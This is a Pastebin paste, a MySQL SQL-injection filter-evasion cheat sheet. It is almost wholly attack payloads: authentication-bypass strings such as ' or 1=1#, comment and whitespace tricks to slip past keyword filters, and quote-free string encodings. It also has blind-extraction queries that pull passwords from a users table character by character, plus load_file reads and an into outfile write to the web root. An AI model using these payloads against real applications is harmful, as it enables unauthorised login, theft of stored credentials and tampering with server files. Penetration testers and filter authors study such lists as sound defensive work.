moemyintshein

SQLi Filter evasion cheat sheet

Mar 15th, 2017
66
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ########################################### Thanks For Reading #######################################################
  2. If You Like You Can Share This Post
  3. ############ SQLi Filter evasion cheat sheet (MYSQL)
  4.  
  5. Basic Filter
  6. Comments
  7.  
  8. Comments
  9. ‘ or 1=1#
  10. ‘ or 1=1– –
  11. ‘ or 1=1/* (MySQL < 5.1)
  12. ' or 1=1;%00
  13. ' or 1=1 union select 1,2 as `
  14. ' or#newline
  15. 1='1
  16. ' or– -newline
  17. 1='1
  18. ' /*!50000or*/1='1
  19. ' /*!or*/1='1
  20.  
  21. Prefixes
  22. + – ~ !
  23. ‘ or –+2=- -!!!’2
  24.  
  25. Operators
  26. ^, =, !=, %, /, *, &, &&, |, ||, , >>, <=, <=, ,, XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, LEAST, GREATEST, CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY, BETWEEN, ISNULL
  27.  
  28. Whitespaces
  29. %20 %09 %0a %0b %0c %0d %a0 /**/
  30. ‘or+(1)sounds/**/like“1“–%a0-
  31. ‘union(select(1),tabe_name,(3)from`information_schema`.`tables`)#
  32.  
  33. Strings with quotes
  34. SELECT ‘a’
  35. SELECT “a”
  36. SELECT n’a’
  37. SELECT b’1100001′
  38. SELECT _binary’1100001′
  39. SELECT x’61’
  40.  
  41. Strings without quotes
  42. ‘abc’ = 0x616263
  43.  
  44. Aliases
  45. select pass as alias from users
  46. select pass aliasalias from users
  47. select pass`alias alias`from users
  48.  
  49. Typecasting
  50. ‘ or true = ‘1 # or 1=1
  51. ‘ or round(pi(),1)+true+true = version() # or 3.1+1+1 = 5.1
  52. ‘ or ‘1 # or true
  53.  
  54. Compare operator typecasting
  55. select * from users where ‘a’=’b’=’c’
  56. select * from users where (‘a’=’b’)=’c’
  57. select * from users where (false)=’c’
  58. select * from users where (0)=’c’
  59. select * from users where (0)=0
  60. select * from users where true
  61. select * from users
  62.  
  63.  
  64. Authentication bypass ‘=’
  65. select * from users where name = ”=”
  66. select * from users where false = ”
  67. select * from users where 0 = 0
  68. select * from users where true
  69. select * from users
  70.  
  71. Authentication bypass ‘-‘
  72. select * from users where name = ”-”
  73. select * from users where name = 0-0
  74. select * from users where 0 = 0
  75. select * from users where true
  76. select * from users
  77. Function filter
  78.  
  79. General function filtering
  80. ascii (97)
  81. load_file/*foo*/(0x616263)
  82.  
  83. Strings with functions
  84. ‘abc’ = unhex(616263)
  85. ‘abc’ = char(97,98,99)
  86. hex(‘a’) = 61
  87. ascii(‘a’) = 97
  88. ord(‘a’) = 97
  89. ‘ABC’ = concat(conv(10,10,36),conv(11,10,36),conv(12,10,36))
  90.  
  91. Strings extracted from gadgets
  92. collation(\N) // binary
  93. collation(user()) // utf8_general_ci
  94. @@time_format // %H:%i:%s
  95. @@binlog_format // MIXED
  96. @@version_comment // MySQL Community Server (GPL)
  97. dayname(from_days(401)) // Monday
  98. dayname(from_days(403)) // Wednesday
  99. monthname(from_days(690)) // November
  100. monthname(from_unixtime(1)) // January
  101. collation(convert((1)using/**/koi8r)) // koi8r_general_ci
  102. (select(collation_name)from(information_schema.collations)where(id)=2) // latin2_czech_cs
  103.  
  104. Special characters extracted from gadgets
  105. aes_encrypt(1,12) // 4çh±{?”^c×HéÉEa
  106. des_encrypt(1,2) // ‚GÒ/ïÖk
  107. @@ft_boolean_syntax // + -><()~*:""&|
  108. @@date_format // %Y-%m-%d
  109. @@innodb_log_group_home_dir // .\
  110.  
  111. Integer representations
  112. false: 0
  113. true: 1
  114. true+true: 2
  115. floor(pi()): 3
  116. ceil(pi()): 4
  117. floor(version()): 5
  118. ceil(version()): 6
  119. ceil(pi()+pi()): 7
  120. floor(version()+pi()): 8
  121. floor(pi()*pi()): 9
  122. ceil(pi()*pi()): 10
  123. concat(true,true): 11
  124. ceil(pi()*pi())+true: 11
  125. ceil(pi()+pi()+version()): 12
  126. floor(pi()*pi()+pi()): 13
  127. ceil(pi()*pi()+pi()): 14
  128. ceil(pi()*pi()+version()): 15
  129. floor(pi()*version()): 16
  130. ceil(pi()*version()): 17
  131. ceil(pi()*version())+true: 18
  132. floor((pi()+pi())*pi()): 19
  133. ceil((pi()+pi())*pi()): 20
  134. ceil(ceil(pi())*version()): 21
  135. concat(true+true,true): 21
  136. ceil(pi()*ceil(pi()+pi())): 22
  137. ceil((pi()+ceil(pi()))*pi()): 23
  138. ceil(pi())*ceil(version()): 24
  139. floor(pi()*(version()+pi())): 25
  140. floor(version()*version()): 26
  141. ceil(version()*version()): 27
  142. ceil(pi()*pi()*pi()-pi()): 28
  143. floor(pi()*pi()*floor(pi())): 29
  144. ceil(pi()*pi()*floor(pi())): 30
  145. concat(floor(pi()),false): 30
  146. floor(pi()*pi()*pi()): 31
  147. ceil(pi()*pi()*pi()): 32
  148. ceil(pi()*pi()*pi())+true: 33
  149. ceil(pow(pi(),pi())-pi()): 34
  150. ceil(pi()*pi()*pi()+pi()): 35
  151. floor(pow(pi(),pi())): 36
  152.  
  153. @@new: 0
  154. @@log_bin: 1
  155.  
  156. !pi(): 0
  157. !!pi(): 1
  158. true-~true: 3
  159. log(-cos(pi())): 0
  160. -cos(pi()): 1
  161. coercibility(user()): 3
  162. coercibility(now()): 4
  163.  
  164. minute(now())
  165. hour(now())
  166. day(now())
  167. week(now())
  168. month(now())
  169. year(now())
  170. quarter(now())
  171. year(@@timestamp)
  172. crc32(true)
  173.  
  174. Extract substrings
  175. substr(‘abc’,1,1) = ‘a’
  176. substr(‘abc’ from 1 for 1) = ‘a’
  177. substring(‘abc’,1,1) = ‘a’
  178. substring(‘abc’ from 1 for 1) = ‘a’
  179. mid(‘abc’,1,1) = ‘a’
  180. mid(‘abc’ from 1 for 1) = ‘a’
  181. lpad(‘abc’,1,space(1)) = ‘a’
  182. rpad(‘abc’,1,space(1)) = ‘a’
  183. left(‘abc’,1) = ‘a’
  184. reverse(right(reverse(‘abc’),1)) = ‘a’
  185. insert(insert(‘abc’,1,0,space(0)),2,222,space(0)) = ‘a’
  186. space(0) = trim(version()from(version()))
  187.  
  188. Search substrings
  189. locate(‘a’,’abc’)
  190. position(‘a’,’abc’)
  191. position(‘a’ IN ‘abc’)
  192. instr(‘abc’,’a’)
  193. substring_index(‘ab’,’b’,1)
  194.  
  195. Cut substrings
  196. length(trim(leading ‘a’ FROM ‘abc’))
  197. length(replace(‘abc’, ‘a’, ”))
  198.  
  199. Compare strings
  200. strcmp(‘a’,’a’)
  201. mod(‘a’,’a’)
  202. find_in_set(‘a’,’a’)
  203. field(‘a’,’a’)
  204. count(concat(‘a’,’a’))
  205.  
  206. String length
  207. length()
  208. bit_length()
  209. char_length()
  210. octet_length()
  211. bit_count()
  212.  
  213. String case
  214. ucase
  215. lcase
  216. lower
  217. upper
  218. password(‘a’) != password(‘A’)
  219. old_password(‘a’) != old_password(‘A’)
  220. md5(‘a’) != md5(‘A’)
  221. sha(‘a’) != sha(‘A’)
  222. aes_encrypt(‘a’) != aes_encrypt(‘A’)
  223. des_encrypt(‘a’) != des_encrypt(‘A’)
  224. Keyword filter
  225.  
  226. Connected keyword filtering
  227. (0)union(select(table_name),column_name,…
  228. 0/**/union/*!50000select*/table_name`foo`/**/…
  229. 0%a0union%a0select%09group_concat(table_name)….
  230. 0’union all select all`table_name`foo from`information_schema`. `tables`
  231.  
  232. OR, AND
  233. ‘||1=’1
  234. ‘&&1=’1
  235. ‘=’
  236. ‘-‘
  237.  
  238. OR, AND, UNION
  239. ‘ and (select pass from users limit 1)=’secret
  240.  
  241. OR, AND, UNION, LIMIT
  242. ‘ and (select pass from users where id =1)=’a
  243.  
  244. OR, AND, UNION, LIMIT, WHERE
  245. ‘ and (select pass from users group by id having id = 1)=’a
  246.  
  247. OR, AND, UNION, LIMIT, WHERE, GROUP
  248. ‘ and length((select pass from users having substr(pass,1,1)=’a’))
  249.  
  250. OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING
  251. ‘ and (select substr(group_concat(pass),1,1) from users)=’a
  252. ‘ and substr((select max(pass) from users),1,1)=’a
  253. ‘ and substr((select max(replace(pass,’lastpw’,”)) from users),1,1)=’a
  254.  
  255. OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT
  256. ‘ and substr(load_file(‘file’),locate(‘DocumentRoot’,(load_file(‘file’)))+length(‘DocumentRoot’),10)=’a
  257. ‘=” into outfile ‘/var/www/dump.txt
  258.  
  259. OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT, FILE
  260. ‘ procedure analyse()#
  261. ‘-if(name=’Admin’,1,0)#
  262. ‘-if(if(name=’Admin’,1,0),if(substr(pass,1,1)=’a’,1,0),0)#
  263.  
  264. Control flow
  265. case ‘a’ when ‘a’ then 1 [else 0] end
  266. case when ‘a’=’a’ then 1 [else 0] end
  267. if(‘a’=’a’,1,0)
  268. ifnull(nullif(‘a’,’a’),1)
Add Comment
Please, Sign In to add comment